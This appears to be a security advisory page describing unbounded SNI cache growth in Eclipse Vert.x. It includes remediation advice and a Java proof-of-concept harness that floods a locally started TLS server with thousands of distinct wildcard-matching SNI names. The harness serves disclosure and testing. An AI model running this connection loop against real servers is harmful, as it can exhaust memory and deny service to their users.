Eclipse Vert.x Wildcard SNI Cache Growth Vulnerability Leading to Denial-of-Service

Vulnerability

A denial-of-service vulnerability has been identified in Eclipse Vert.x versions 4.3.4 through 5.0.8. The issue arises from unbounded growth of the server-side SNI (Server Name Indication) cache during TLS handshakes. When a TCP client presents an SNI name that matches a wildcard certificate (e.g., *.example.com), the server adds an entry for that name to the cache, and it does so for every distinct matching name, with no size limit and no eviction policy. Because the client chooses the SNI value and sends it in the TLS ClientHello, before any application-level authentication can take place, a remote client can create as many entries as it has distinct names to send. Memory consumption therefore grows steadily with each new matching name and can end in resource exhaustion.

Impact

An unauthenticated remote client that can open TLS connections to the server can cause unbounded memory growth by presenting a new matching SNI name on each connection. Because cached entries are never evicted, the growth persists after the connections close and accumulates until the process exhausts its heap, resulting in a denial-of-service condition.

Reproduction

To reproduce this vulnerability, configure a Vert.x server to use SSL, enable server-side SNI, and provision it with a wildcard certificate such as *.example.com. Then open repeated TLS connections to the server, each presenting a distinct SNI value that matches the wildcard (for example h1.example.com, h2.example.com, and so on). The SNI cache gains one entry for each unique matching name, so the server's retained memory grows in proportion to the number of distinct names sent; watching the heap with a JVM tool such as jcmd <pid> GC.class_histogram while the connections are being made shows the growth. Repeating the same name does not add entries, so the number of distinct names, not the raw connection count, determines how much memory is consumed.
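The following harness carries out the procedure above in Vert.x's own API. It is an added example written for this page, not code from the Vert.x project or from the original advisory. It assumes a PEM key pair for a *.example.com wildcard certificate in the files named in the constants, an arbitrary local port, and the Future-returning NetClient.connect(port, host, serverName) and NetServer.listen(port, host) methods present in the Vert.x 4.x and 5.x APIs; the file names, port and connection count are placeholders chosen for illustration.

```java
import io.vertx.core.Vertx;
import io.vertx.core.net.NetClient;
import io.vertx.core.net.NetClientOptions;
import io.vertx.core.net.NetServer;
import io.vertx.core.net.NetServerOptions;
import io.vertx.core.net.PemKeyCertOptions;

// Added reproduction harness for the SNI cache growth issue described above.
// Not part of Vert.x or of the original advisory. Assumes a PEM key pair for a
// wildcard certificate (*.example.com) in the files named below (assumed names).
public class SniCacheGrowthRepro {

  static final int PORT = 8443;                          // assumed local port
  static final int DISTINCT_NAMES = 10_000;              // distinct SNI names to send
  static final String WILDCARD_KEY = "wildcard-key.pem";   // assumed file names
  static final String WILDCARD_CERT = "wildcard-cert.pem";

  public static void main(String[] args) {
    Vertx vertx = Vertx.vertx();

    // Server side: TLS with server-side SNI enabled and a single wildcard
    // certificate. Every client name matching *.example.com resolves to this
    // certificate, and affected versions keep a per-name cache entry without bound.
    NetServerOptions serverOptions = new NetServerOptions()
        .setSsl(true)
        .setSni(true)
        .setKeyCertOptions(new PemKeyCertOptions()
            .setKeyPath(WILDCARD_KEY)
            .setCertPath(WILDCARD_CERT));

    NetServer server = vertx.createNetServer(serverOptions)
        .connectHandler(socket -> socket.close());   // the handshake alone is enough

    server.listen(PORT, "localhost")
        .onSuccess(s -> runClient(vertx))
        .onFailure(err -> {
          err.printStackTrace();
          vertx.close();
        });
  }

  // Client side: open connections one after another, each with a fresh SNI name
  // that matches the wildcard. Distinct names, not connection count, drive the growth.
  static void runClient(Vertx vertx) {
    NetClientOptions clientOptions = new NetClientOptions()
        .setSsl(true)
        .setTrustAll(true);   // test-only: skip certificate validation against localhost
    NetClient client = vertx.createNetClient(clientOptions);
    connectNext(client, 0);
  }

  static void connectNext(NetClient client, int i) {
    if (i >= DISTINCT_NAMES) {
      System.out.println("Sent " + DISTINCT_NAMES
          + " distinct SNI names; inspect the server heap now (e.g. jcmd <pid> GC.class_histogram).");
      return;   // leave the server running so the retained entries can be inspected
    }
    String sni = "h" + i + ".example.com";   // unique per connection, matches *.example.com
    client.connect(PORT, "localhost", sni)
        .onComplete(ar -> {
          if (ar.succeeded()) {
            ar.result().close();   // closing does not evict the cached entry
          }
          connectNext(client, i + 1);
        });
  }
}
```

Run the class with the Vert.x core jar on the classpath and compare a heap histogram taken before and after the loop; the entries added per distinct name are what the advisory calls the SNI cache. Sending the same name repeatedly, or disabling SNI with setSni(false) in the server options, is the control case against which the growth should be compared.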

Remediation

Users can disable server-side SNI if it is not needed, which removes the per-name cache altogether. Where SNI is required, avoid wildcard hostname mappings and serve certificates for explicitly named hosts, so that only the configured host names can match and the cache cannot be grown with arbitrary client-chosen names. Rate limiting or connection controls in front of the service slow the rate at which an attacker can add entries, but since entries are not evicted they bound the rate of growth rather than its total, and should be treated as a stop-gap rather than a fix.

Added: May 6, 2026, 10:23 AM
Updated: May 6, 2026, 10:23 AM

Vulnerability Rating

Custom Algorithm

spread          5.4
impact          2.5
exploitability  6.0
remediation     8.3
relevance       7.6
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.